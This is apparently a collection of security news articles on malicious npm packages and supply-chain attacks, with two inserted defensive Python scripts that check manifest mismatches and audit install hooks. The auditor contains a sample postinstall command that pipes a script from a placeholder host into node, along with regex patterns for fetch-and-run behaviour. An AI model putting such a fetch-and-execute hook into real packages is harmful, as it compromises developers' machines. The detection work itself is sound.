Over 800 npm Packages Found with Discrepancies, 18 Exploitable to ‘Manifest Confusion’
http://www.indiavpn.org/2024/03/21/over-800-npm-packages-found-with-discrepancies-18-exploitable-to-manifest-confusion/
Thu, 21 Mar 2024 14:52:28 +0000

Mar 21, 2024 | Newsroom | Software Security / Open Source

New research has discovered over 800 packages in the npm registry whose tarball contents have discrepancies from their registry entries, 18 of which have been found to exploit a technique called manifest confusion.

The findings come from cybersecurity firm JFrog, which said the issue could be exploited by threat actors to trick developers into running malicious code.

“It’s an actual threat since developers may be tricked into downloading packages that look innocent, but whose hidden dependencies are actually malicious,” security researcher Andrey Polkovnichenko told The Hacker News.


Manifest confusion was first documented in July 2023, when security researcher Darcy Clarke found that mismatches in manifest and package metadata could be weaponized to stage software supply chain attacks.

The problem stems from the fact that the npm registry does not validate whether the manifest file contained in the tarball (package.json) matches the manifest data provided to the npm server during the publishing process via an HTTP PUT request to the package URI endpoint.

As a result, a threat actor could take advantage of this lack of cross-verification to supply a different manifest containing hidden dependencies that is processed during package installation, stealthily installing malicious dependencies onto the developer’s system.

“The visible, or ‘fake,’ manifest can mislead developers and even audit tools that rely on the data available in the npm registry database,” JFrog said. “In reality, the installer takes the file package.json from the tarball, which may be different from the visible one supplied in the HTTP PUT request.”
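The check described above, as an added example that is not JFrog’s or npm’s own code: it compares the manifest the registry shows (what audit tools and npm’s website see) with the package.json inside the tarball (what the installer actually reads). The registry manifest and the tarball are constructed inline so the script runs offline; for a real package the manifest would be fetched from https://registry.npmjs.org/<name>/<version> and the tarball from the URL in its "dist.tarball" field. The package and dependency names are hypothetical.

```python
"""Check an npm package for manifest confusion.

Added example, not JFrog's or npm's code. It compares the manifest the
registry shows (what `npm view` and audit tools see) with the package.json
inside the tarball (what `npm install` actually uses). The registry manifest
and the tarball below are constructed inline so the script runs offline; for a
real package, fetch https://registry.npmjs.org/<name>/<version> and the URL in
its "dist.tarball" field instead.
"""
import io
import json
import tarfile

DEP_FIELDS = ("dependencies", "devDependencies",
              "optionalDependencies", "peerDependencies")

# Constructed sample: the registry shows one dependency and no scripts.
REGISTRY_MANIFEST = {
    "name": "example-widget",        # hypothetical package name
    "version": "1.0.0",
    "dependencies": {"lodash": "^4.17.21"},
}

# Constructed sample: the package.json shipped in the tarball adds a
# dependency and a postinstall hook that the registry entry never shows.
TARBALL_PACKAGE_JSON = {
    "name": "example-widget",
    "version": "1.0.0",
    "dependencies": {"lodash": "^4.17.21", "hidden-helper": "1.0.0"},
    "scripts": {"postinstall": "node setup.js"},
}


def build_tarball(package_json):
    """Build a minimal npm-style .tgz in memory (npm roots files under package/)."""
    data = json.dumps(package_json, indent=2).encode()
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        info = tarfile.TarInfo("package/package.json")
        info.size = len(data)
        tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def read_tarball_manifest(tgz):
    """Return the package.json that the installer reads from the tarball."""
    with tarfile.open(fileobj=io.BytesIO(tgz), mode="r:gz") as tar:
        for member in tar.getmembers():
            # The top-level directory is conventionally "package" but is not
            # enforced, so match any <dir>/package.json at depth one.
            parts = member.name.split("/")
            if member.isfile() and len(parts) == 2 and parts[1] == "package.json":
                return json.load(tar.extractfile(member))
    raise ValueError("tarball contains no package.json")


def find_discrepancies(registry_manifest, tarball_manifest):
    """Return the fields where the tarball disagrees with the registry manifest."""
    report = {"metadata_mismatch": {}, "hidden_dependencies": {},
              "missing_dependencies": {}, "script_mismatch": {}}
    for key in ("name", "version"):
        if registry_manifest.get(key) != tarball_manifest.get(key):
            report["metadata_mismatch"][key] = {
                "registry": registry_manifest.get(key),
                "tarball": tarball_manifest.get(key)}
    for field in DEP_FIELDS:
        reg = registry_manifest.get(field) or {}
        tar = tarball_manifest.get(field) or {}
        for name, spec in tar.items():   # in the tarball, absent/different in registry
            if reg.get(name) != spec:
                report["hidden_dependencies"].setdefault(field, {})[name] = spec
        for name, spec in reg.items():   # shown by the registry, not in the tarball
            if name not in tar:
                report["missing_dependencies"].setdefault(field, {})[name] = spec
    reg_scripts = registry_manifest.get("scripts") or {}
    tar_scripts = tarball_manifest.get("scripts") or {}
    for hook in sorted(set(reg_scripts) | set(tar_scripts)):
        if reg_scripts.get(hook) != tar_scripts.get(hook):
            report["script_mismatch"][hook] = {
                "registry": reg_scripts.get(hook),
                "tarball": tar_scripts.get(hook)}
    return report


def is_manifest_confused(report):
    """True when the installer would use something the registry does not show."""
    return any(report[key] for key in report)


if __name__ == "__main__":
    shipped = read_tarball_manifest(build_tarball(TARBALL_PACKAGE_JSON))
    result = find_discrepancies(REGISTRY_MANIFEST, shipped)
    print(json.dumps(result, indent=2))
    print("manifest confusion:", is_manifest_confused(result))
```

Any non-empty entry in the report is worth a look, but hidden_dependencies and script_mismatch are the ones that matter for manifest confusion, because those are exactly the fields the installer acts on without the registry page reflecting them.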


The company said it identified more than 800 packages where there was a mismatch between the manifest in the npm registry and the package.json file inside the tarball.

While many of these mismatches are the result of protocol specification differences or variations in the scripts section of the package file, 18 of them are said to have been designed to exploit manifest confusion.

A notable package in question is yatai-web-ui, which is designed to send an HTTP request to a server with information about the IP address of the machine on which the package was installed.


The findings suggest that the attack vector has never been put to use by threat actors. That said, it’s crucial that developers take steps to ensure the packages they use are free of suspicious behaviors.

“Since this issue was not resolved by npm, trusting packages only by how they look on npm’s website might be risky,” Polkovnichenko said.

“Organizations should introduce procedures that verify that all packages that enter the organization or are used by their dev teams are safe and can be trusted. Specifically in the case of manifest confusion, it’s required that every package is analyzed to see if there are any hidden dependencies.”

North Korean Hackers Targeting Developers with Malicious npm Packages
http://www.indiavpn.org/2024/02/26/north-korean-hackers-targeting-developers-with-malicious-npm-packages/
Mon, 26 Feb 2024 13:19:39 +0000

Feb 26, 2024 | The Hacker News | Software Security / Cryptocurrency


A set of fake npm packages discovered on the Node.js repository has been found to share ties with North Korean state-sponsored actors, new findings from Phylum show.

The packages are named execution-time-async, data-time-utils, login-time-utils, mongodb-connection-utils, and mongodb-execution-utils.

One of the packages in question, execution-time-async, masquerades as its legitimate counterpart execution-time, a library with more than 27,000 weekly downloads. Execution-time is a Node.js utility used to measure execution time in code.

It “actually installs several malicious scripts including a cryptocurrency and credential stealer,” Phylum said, describing the campaign as a software supply chain attack targeting software developers. The package was downloaded 302 times since February 4, 2024, before being taken down.


In an interesting twist, the threat actors made efforts to conceal the obfuscated malicious code in a test file, which is designed to fetch next-stage payloads from a remote server, steal credentials from web browsers like Brave, Google Chrome, and Opera, and retrieve a Python script, which, in turn, downloads other scripts:

  • ~/.n2/pay, which can run arbitrary commands, download and launch ~/.n2/bow and ~/.n2/adc, terminate Brave and Google Chrome, and even delete itself
  • ~/.n2/bow, which is a Python-based browser password stealer
  • ~/.n2/adc, which installs AnyDesk on Windows

Phylum said it identified comments in the source code (“/Users/ninoacuna/”) that made it possible to track down a now-deleted GitHub profile with the same name (“Nino Acuna” or binaryExDev) containing a repository called File-Uploader.

Present within the repository were Python scripts referencing the same IP addresses (162.218.114[.]83 – subsequently changed to 45.61.169[.]99) used to fetch the aforementioned Python scripts.


It’s suspected that the attack is a work in progress, as at least four more packages with identical features have made their way to the npm package repository, attracting a total of 325 downloads –

Connections to North Korean Actors Emerge

Phylum, which also analyzed the two GitHub accounts that binaryExDev follows, uncovered another repository known as mave-finance-org/auth-playground, which has been forked no less than a dozen times by other accounts.


While forking a repository in itself isn’t unusual, what stood out about some of these forks was that they were renamed “auth-demo” or “auth-challenge,” raising the possibility that the original repository may have been shared as part of a coding test for a job interview.

The repository was later moved to banus-finance-org/auth-sandbox, Dexbanus-org/live-coding-sandbox, and mave-finance/next-assessment, indicating attempts to actively get around GitHub’s takedown attempts. All these accounts have been removed.


What’s more, the next-assessment package was found to contain a dependency “json-mock-config-server” that’s not listed on the npm registry, but rather served directly from the domain npm.mave[.]finance.

It’s worth noting that Banus claims to be a decentralized perpetual spot exchange based in Hong Kong, with the company even posting a job opportunity for a senior frontend developer on February 21, 2024. It’s currently not clear if this is a genuine job opening or if it’s an elaborate social engineering scheme.

The connections to North Korean threat actors come from the fact that the obfuscated JavaScript embedded in the npm package overlaps with another JavaScript-based malware dubbed BeaverTail that’s propagated via npm packages. The campaign was codenamed Contagious Interview by Palo Alto Networks Unit 42 in November 2023.

Contagious Interview is a little different from Operation Dream Job – which is linked to the Lazarus Group – in that it’s mainly focused on targeting developers through fake identities in freelance job portals to trick them into installing rogue npm packages, Michael Sikorski, vice president and CTO of Palo Alto Networks Unit 42, told The Hacker News at the time.

One of the developers who fell victim to the campaign has since confirmed to Phylum that the repository was shared under the guise of a live coding interview, although they said they never installed it on their system.

“More than ever, it is important for both individual developers as well as software development organizations to remain vigilant against these attacks in open-source code,” the company said.

Malicious NPM Packages Exfiltrate Hundreds of Developer SSH Keys via GitHub
http://www.indiavpn.org/2024/01/23/malicious-npm-packages-exfiltrate-hundreds-of-developer-ssh-keys-via-github/
Tue, 23 Jan 2024 16:15:38 +0000

Jan 23, 2024 | Newsroom | Software Security / Supply Chain


Two malicious packages discovered on the npm package registry have been found to leverage GitHub to store Base64-encoded SSH keys stolen from the developer systems on which they were installed.

The modules named warbeast2000 and kodiak2k were published at the start of the month, attracting 412 and 1,281 downloads before they were taken down by the npm maintainers. The most recent downloads occurred on January 21, 2024.

Software supply chain security firm ReversingLabs, which made the discovery, said there were eight different versions of warbeast2000 and more than 30 versions of kodiak2k.

Both modules run a postinstall script after installation, which retrieves and executes two different JavaScript files.
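A defender-side check for the install hook described above, as an added example that is not ReversingLabs’ code: it lists the lifecycle scripts npm runs on its own during `npm install` and flags commands that fetch or execute code the package did not ship with. The two package.json documents are constructed samples (the names and the example.invalid host are placeholders), and the indicator list is a starting point for review rather than a complete detector.

```python
"""Audit the install-time lifecycle scripts declared in an npm package.json.

Added example, not ReversingLabs' code. It lists the hooks npm runs on its own
during `npm install` and flags commands that fetch or execute code the package
did not ship with. The two package.json documents are constructed samples; the
indicator list is a starting point for review, not a complete detector.
"""
import json
import re

# Lifecycle hooks npm executes automatically on install.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# (label, pattern) pairs for behaviour worth a second look in an install hook.
INDICATORS = [
    ("remote-fetch", re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr)\b", re.I)),
    ("url", re.compile(r"https?://", re.I)),
    ("inline-eval", re.compile(r"\bnode\s+(-e|--eval)\b")),
    ("pipe-to-interpreter",
     re.compile(r"\|\s*(sh|bash|node|python3?|powershell)\b", re.I)),
    ("encoded-payload", re.compile(r"\bbase64\b|\s-enc(odedcommand)?\b", re.I)),
]

# Constructed sample: a native build step, nothing fetched at install time.
BENIGN_PACKAGE_JSON = json.dumps({
    "name": "example-native-lib", "version": "2.3.1",
    "scripts": {"postinstall": "node scripts/build-native.js",
                "prepare": "npm run build", "test": "jest"},
})

# Constructed sample in the shape the article describes: a postinstall hook
# that pulls a second-stage script from a remote host and runs it.
SUSPICIOUS_PACKAGE_JSON = json.dumps({
    "name": "example-util", "version": "1.0.0",
    "scripts": {"postinstall": "curl -s https://example.invalid/stage2.js | node"},
})


def audit_install_scripts(package_json_text):
    """Return one finding per install hook: hook, command, matched indicators."""
    manifest = json.loads(package_json_text)
    scripts = manifest.get("scripts") or {}
    findings = []
    for hook in INSTALL_HOOKS:
        command = scripts.get(hook)
        if not command:
            continue
        hits = [label for label, pattern in INDICATORS if pattern.search(command)]
        findings.append({"hook": hook, "command": command, "indicators": hits})
    return findings


def risk_level(findings):
    """'none' without install hooks, 'review' with hooks, 'high' when indicators hit."""
    if not findings:
        return "none"
    if any(f["indicators"] for f in findings):
        return "high"
    return "review"


if __name__ == "__main__":
    for label, text in (("benign", BENIGN_PACKAGE_JSON),
                        ("suspicious", SUSPICIOUS_PACKAGE_JSON)):
        findings = audit_install_scripts(text)
        print(label, risk_level(findings))
        for f in findings:
            print(f"  {f['hook']}: {f['command']!r} -> {f['indicators']}")
```

Any package that declares an install hook deserves a look even when no indicator fires, since a hook can load its payload from a file inside the tarball rather than from a URL. Where install hooks are not needed at all, `npm install --ignore-scripts` (or `npm config set ignore-scripts true`) prevents npm from running them, at the cost of packages that legitimately build native code on install.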


While warbeast2000 attempts to access the private SSH key, kodiak2k is designed to look for a key named “meow,” raising the possibility that the threat actor used a placeholder name during the early stages of development.

“This second stage malicious script reads the private SSH key stored in the id_rsa file located in the <homedir>/.ssh directory,” security researcher Lucija Valentić said. “It then uploaded the Base64-encoded key to an attacker-controlled GitHub repository.”

Subsequent versions of kodiak2k were found to execute a script found in an archived GitHub project hosting the Empire post-exploitation framework. The script is capable of launching the Mimikatz hacking tool to dump credentials from process memory.

“The campaign is just the latest example of cybercriminals and malicious actors using open source package managers and related infrastructure to support malicious software supply chain campaigns that target development organizations and end-user organizations,” Valentić said.

Npm Trojan Bypasses UAC, Installs AnyDesk with “Oscompatible” Package
http://www.indiavpn.org/2024/01/19/npm-trojan-bypasses-uac-installs-anydesk-with-oscompatible-package/
Fri, 19 Jan 2024 09:42:17 +0000

Jan 19, 2024 | Newsroom | Software Security / Spyware


A malicious package uploaded to the npm registry has been found deploying a sophisticated remote access trojan on compromised Windows machines.

The package, named “oscompatible,” was published on January 9, 2024, attracting a total of 380 downloads before it was taken down.

oscompatible included a “few strange binaries,” according to software supply chain security firm Phylum, including a single executable file, a dynamic-link library (DLL) and an encrypted DAT file, alongside a JavaScript file.

This JavaScript file (“index.js”) executes an “autorun.bat” batch script but only after running a compatibility check to determine if the target machine runs on Microsoft Windows.

If the platform is not Windows, it displays an error message to the user, stating the script is running on Linux or an unrecognized operating system, urging them to run it on “Windows Server OS.”

The batch script, for its part, verifies if it has admin privileges, and if not, runs a legitimate Microsoft Edge component called “cookie_exporter.exe” via a PowerShell command.


Attempting to run the binary will trigger a User Account Control (UAC) prompt asking the target to execute it with administrator credentials.

Once that happens, the threat actor carries out the next stage of the attack by running the DLL (“msedge.dll”) through a technique called DLL search order hijacking.

The trojanized version of the library is designed to decrypt the DAT file (“msedge.dat”) and launch another DLL called “msedgedat.dll,” which, in turn, establishes connections with an actor-controlled domain named “kdark1[.]com” to retrieve a ZIP archive.

The ZIP file comes fitted with the AnyDesk remote desktop software as well as a remote access trojan (“verify.dll”) that’s capable of fetching instructions from a command-and-control (C2) server via WebSockets and gathering sensitive information from the host.

It also “installs Chrome extensions to Secure Preferences, configures AnyDesk, hides the screen, and disables shutting down Windows, [and] captures keyboard and mouse events,” Phylum said.


While “oscompatible” appears to be the only npm module employed as part of the campaign, the development is once again a sign that threat actors are increasingly targeting open-source software (OSS) ecosystems for supply chain attacks.

“From the binary side, the process of decrypting data, using a revoked certificate for signing, pulling other files from remote sources, and attempting to disguise itself as a standard Windows update process all along the way is relatively sophisticated compared to what we normally see in OSS ecosystems,” the company said.

The disclosure comes as cloud security firm Aqua revealed that 21.2% of the top 50,000 most downloaded npm packages are deprecated, exposing users to security risks. Those deprecated packages are downloaded an estimated 2.1 billion times weekly.

This includes archived and deleted GitHub repositories associated with the packages as well as those that are maintained without a visible repository, commit history, and issue tracking.

“This situation becomes critical when maintainers, instead of addressing security flaws with patches or CVE assignments, opt to deprecate affected packages,” security researchers Ilay Goldman and Yakir Kadkoda said.

“What makes this particularly concerning is that, at times, these maintainers do not officially mark the package as deprecated on npm, leaving a security gap for users who may remain unaware of potential threats.”
